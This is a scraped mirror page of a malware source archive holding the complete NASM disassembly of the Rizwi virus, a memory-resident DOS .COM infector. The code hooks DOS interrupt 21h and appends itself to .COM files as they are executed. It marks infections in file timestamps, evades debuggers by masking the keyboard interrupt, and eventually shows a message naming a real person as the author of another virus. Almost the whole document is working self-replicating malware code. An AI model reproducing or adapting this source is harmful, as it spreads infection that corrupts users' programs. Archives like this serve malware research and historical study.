mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
298 lines
7.6 KiB
NASM
298 lines
7.6 KiB
NASM
|
;Rizwi Virus from the TridenT research group.
|
||
|
;Memory resident .COM infector.
|
||
|
|
||
|
;This virus is only active after the spring of 1994.
|
||
|
;When active, it infects .COM files on execution, and keeps
|
||
|
;track of the number of files that it has infected. While it has
|
||
|
;infected between 0C8h and 0f0h files, it displays the message
|
||
|
;that " Righard Zwienenberg made the DUTCH-555 virus!!! " on
|
||
|
;the screen.
|
||
|
|
||
|
;This virus has some anti-debugging code, as it masks the keyboard
|
||
|
;interrupt and checks to see if it remaines masked, so when debugging
|
||
|
;through it one must jump over these sections of code (In/Out port 21h
|
||
|
;and the checking of ax accompanying them).
|
||
|
|
||
|
;Disassembly by Black Wolf
|
||
|
|
||
|
.model tiny
|
||
|
.code
|
||
|
|
||
|
org 100h
|
||
|
|
||
|
start:
|
||
|
call Get_Offset
|
||
|
Get_Offset:
|
||
|
pop bp
|
||
|
sub bp,offset Get_Offset
|
||
|
|
||
|
mov ah,30h
|
||
|
int 21h ;Get Dos version/Install Check
|
||
|
|
||
|
cmp bx,4243h
|
||
|
je DoneInstall ;Already Installed
|
||
|
|
||
|
mov ah,2Ah
|
||
|
int 21h ;Get date
|
||
|
|
||
|
in al,21h ;Read interrupt masks...
|
||
|
|
||
|
cmp cx,1993 ;Is year later than 1993?
|
||
|
ja GoMemRes ;If not, exit.
|
||
|
|
||
|
cmp dh,4
|
||
|
ja GoMemRes ;Is month < May, exit.
|
||
|
DoneInstall:
|
||
|
db 0e9h,74h,0 ;jmp ReturnToHost
|
||
|
|
||
|
GoMemRes:
|
||
|
or al,2
|
||
|
push ax
|
||
|
mov ax,351Ch
|
||
|
int 21h ;Get timer interrupt
|
||
|
|
||
|
mov cs:[Int1cIP+bp],bx
|
||
|
mov cs:[Int1cCS+bp],es
|
||
|
|
||
|
pop ax
|
||
|
out 21h,al ;Interrupt - disable keyboard?
|
||
|
|
||
|
SetInterrupts:
|
||
|
mov ax,3521h
|
||
|
int 21h ;Get int 21 address
|
||
|
|
||
|
mov word ptr cs:[OldInt21+bp],bx
|
||
|
mov word ptr cs:[OldInt21+2+bp],es
|
||
|
in al,21h
|
||
|
and al,2
|
||
|
push ax
|
||
|
|
||
|
mov ax,cs
|
||
|
dec ax
|
||
|
mov ds,ax ;Set DS = MCB
|
||
|
cmp byte ptr ds:0,'Z' ;Are we at the end of the
|
||
|
jne ReturnToHost ;memory chain?
|
||
|
|
||
|
;sub word ptr ds:[3],27h ;Decrease MCB size
|
||
|
db 81h,2eh,03,0,27h,0
|
||
|
|
||
|
;sub word ptr ds:[12h],27h ;Decrease PSP top of memory
|
||
|
db 81h,2eh,12h,0,27h,0
|
||
|
|
||
|
lea si,[bp+100h] ;SI = beginning of virus
|
||
|
mov di,100h ;DI = new offset (100h)
|
||
|
|
||
|
pop ax
|
||
|
cmp al,2 ;Did someone skip interrupt
|
||
|
jne SetInterrupts ;disabling code? If so,
|
||
|
;loop them back to redo
|
||
|
;interrupt setting.
|
||
|
|
||
|
|
||
|
mov ax,ds:[12h] ;Get free segment
|
||
|
sub ax,10h ;Subtract 10h to account for
|
||
|
mov es,ax ; offset of 100h
|
||
|
mov cx,263h
|
||
|
push cs
|
||
|
pop ds
|
||
|
rep movsb ;Copy virus into memory
|
||
|
in al,21h
|
||
|
xor al,2
|
||
|
push es
|
||
|
pop ds
|
||
|
out 21h,al ;Do the keyboard int again...
|
||
|
|
||
|
mov ax,251Ch
|
||
|
mov dx,offset Int1cHandler
|
||
|
int 21h ;Set int 1ch
|
||
|
|
||
|
|
||
|
mov ax,2521h
|
||
|
mov dx,offset Int21Handler
|
||
|
int 21h ;Set int 21h
|
||
|
|
||
|
ReturnToHost:
|
||
|
push cs ;Restore Seg regs
|
||
|
pop ds
|
||
|
push ds
|
||
|
pop es
|
||
|
mov di,100h
|
||
|
push di
|
||
|
lea si,[bp+Storage_Bytes] ;Storage bytes
|
||
|
movsw
|
||
|
movsb ;Restore host
|
||
|
ret
|
||
|
|
||
|
|
||
|
Storage_Bytes:
|
||
|
int 20h
|
||
|
popf
|
||
|
|
||
|
TridenT_ID db '[TridenT]'
|
||
|
|
||
|
FakeInt21h:
|
||
|
pushf
|
||
|
call dword ptr cs:OldInt21 ;Fake Interrupt 21h
|
||
|
retn
|
||
|
|
||
|
|
||
|
VirusVersion db '{V1.1 Bugfix}'
|
||
|
|
||
|
OldInt21 dw 0, 0
|
||
|
|
||
|
Int21Handler:
|
||
|
cmp ax,4b00h
|
||
|
je IsExecute
|
||
|
cmp ah,30h
|
||
|
jnz ExitInt21
|
||
|
call FakeInt21h
|
||
|
mov bx,4243h
|
||
|
iret
|
||
|
|
||
|
ExitInt21:
|
||
|
jmp dword ptr cs:OldInt21
|
||
|
|
||
|
IsExecute:
|
||
|
push ax bx cx dx si di ds es bp ds dx
|
||
|
|
||
|
mov ax,4300h
|
||
|
call FakeInt21h ;Get attributes
|
||
|
|
||
|
mov FileAttribs,cx ;Save them
|
||
|
xor cx,cx
|
||
|
mov ax,4301h ;Reset Attributes
|
||
|
call FakeInt21h
|
||
|
|
||
|
mov ax,3D02h ;Open file
|
||
|
call FakeInt21h
|
||
|
|
||
|
mov Filehandle,ax
|
||
|
xchg ax,bx
|
||
|
mov ax,5700h
|
||
|
call FakeInt21h ;Get file date/time
|
||
|
mov cs:[FileTime],cx ; and save them
|
||
|
mov cs:[FileDate],dx
|
||
|
and cx,1Fh
|
||
|
cmp cx,1Fh ;Check infection in time stamp
|
||
|
jne Infect_File
|
||
|
|
||
|
|
||
|
CloseFile:
|
||
|
mov ah,3Eh
|
||
|
call FakeInt21h
|
||
|
|
||
|
pop dx ;Pop filename address
|
||
|
pop ds
|
||
|
mov cx,FileAttribs
|
||
|
mov ax,4301h
|
||
|
call FakeInt21h ;Reset Attributes
|
||
|
|
||
|
db 0e9h, 67h, 0 ;jmp DoneInfect
|
||
|
|
||
|
Infect_File:
|
||
|
mov ah,3Fh
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov dx,offset Storage_Bytes
|
||
|
mov cx,3
|
||
|
call FakeInt21h ;Read in first 3 bytes
|
||
|
|
||
|
cmp word ptr cs:[Storage_Bytes],4D5Ah ;Is EXE?
|
||
|
je CloseFile
|
||
|
cmp word ptr cs:[Storage_Bytes],5A4Dh ;Is alternate EXE?
|
||
|
je CloseFile
|
||
|
|
||
|
mov ax,4202h
|
||
|
xor cx,cx
|
||
|
xor dx,dx
|
||
|
call FakeInt21h ;Go to the end of file
|
||
|
|
||
|
sub ax,3 ;adjust size for jump
|
||
|
mov word ptr [JumpSize],ax ;save jump size
|
||
|
|
||
|
mov ah,40h
|
||
|
mov dx,100h
|
||
|
mov cx,263h
|
||
|
call FakeInt21h ;Append Virus to host
|
||
|
|
||
|
mov ax,4200h
|
||
|
xor cx,cx
|
||
|
xor dx,dx ;Go to beginning
|
||
|
call FakeInt21h ;of host file.
|
||
|
|
||
|
mov ah,40h
|
||
|
mov dx,358h
|
||
|
mov cx,3
|
||
|
call FakeInt21h ;Write Jump bytes
|
||
|
|
||
|
mov ax,5701h
|
||
|
mov cx,[FileTime]
|
||
|
mov dx,[FileDate]
|
||
|
or cx,1Fh ;Mark infection in time stamp
|
||
|
call FakeInt21h ;Restore time/date
|
||
|
|
||
|
inc byte ptr cs:[Counter] ;Activation counter...
|
||
|
jmp short CloseFile
|
||
|
|
||
|
DoneInfect:
|
||
|
pop bp es ds di si dx cx bx ax
|
||
|
jmp ExitInt21
|
||
|
|
||
|
Int1cIP dw 0
|
||
|
Int1cCS dw 0
|
||
|
|
||
|
Int1cHandler: ;While infections are between C8h and F0h,
|
||
|
;Stick message on screen every once in a while.
|
||
|
pushf
|
||
|
push ax cx si di ds es
|
||
|
cmp byte ptr cs:[Counter],0C8h
|
||
|
jb ExitInt1c
|
||
|
cmp byte ptr cs:[Counter],0F0h
|
||
|
ja ExitInt1c
|
||
|
cmp word ptr cs:[TimerCount],5000h
|
||
|
je WriteMessageToScreen
|
||
|
inc word ptr cs:[TimerCount]
|
||
|
|
||
|
db 0e9h,16h,0 ;jmp ExitInt1c
|
||
|
|
||
|
WriteMessageToScreen:
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov ax,0B800h ;Text Screen memory
|
||
|
mov es,ax
|
||
|
mov si,offset Message
|
||
|
mov di,0A0h
|
||
|
db 81h,0efh,62h,0 ;sub di,EndMessage-Message
|
||
|
mov cx,EndMessage-Message
|
||
|
rep movsb
|
||
|
|
||
|
ExitInt1c:
|
||
|
pop es ds di si cx ax
|
||
|
popf
|
||
|
iret
|
||
|
|
||
|
;Message says " Righard Zwienenberg made the DUTCH-555 virus!!! "
|
||
|
;Capital O's are attribute values....
|
||
|
|
||
|
Message:
|
||
|
db ' OROiOgOhOaOrOdO OZOwOiOeOnOeOnO'
|
||
|
db 'bOeOrOgO OmOaOdOeO OtOhOeO ODOUO'
|
||
|
db 'TOCOHO-O5O5O5O OVOiOrOuOsO!O!O!O'
|
||
|
db ' O'
|
||
|
EndMessage:
|
||
|
|
||
|
Counter db 0
|
||
|
|
||
|
TimerCount dw 0
|
||
|
|
||
|
JumpBytes db 0E9h
|
||
|
JumpSize dw 0
|
||
|
|
||
|
FileAttribs dw 0
|
||
|
Filehandle dw 0
|
||
|
FileDate dw 0
|
||
|
FileTime dw 0
|
||
|
|
||
|
end start
|
||
|
|